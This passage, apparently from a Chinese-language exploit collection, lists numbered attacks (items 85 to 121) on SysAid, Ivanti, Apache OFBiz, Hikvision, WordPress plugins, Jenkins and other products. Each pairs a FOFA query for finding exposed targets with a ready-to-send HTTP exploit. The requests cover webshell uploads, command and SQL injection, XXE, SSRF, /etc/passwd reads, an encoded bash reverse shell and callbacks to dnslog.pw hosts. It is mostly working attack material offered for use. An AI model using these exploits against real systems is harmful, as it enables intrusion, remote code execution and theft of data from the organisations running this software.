Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

The written file is served at http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request:

/jfhatuwe.php

88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Then request:

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi'anxin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then request:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Wangshen (奇安信网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. TOTOLINK T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (北京百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (北京百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
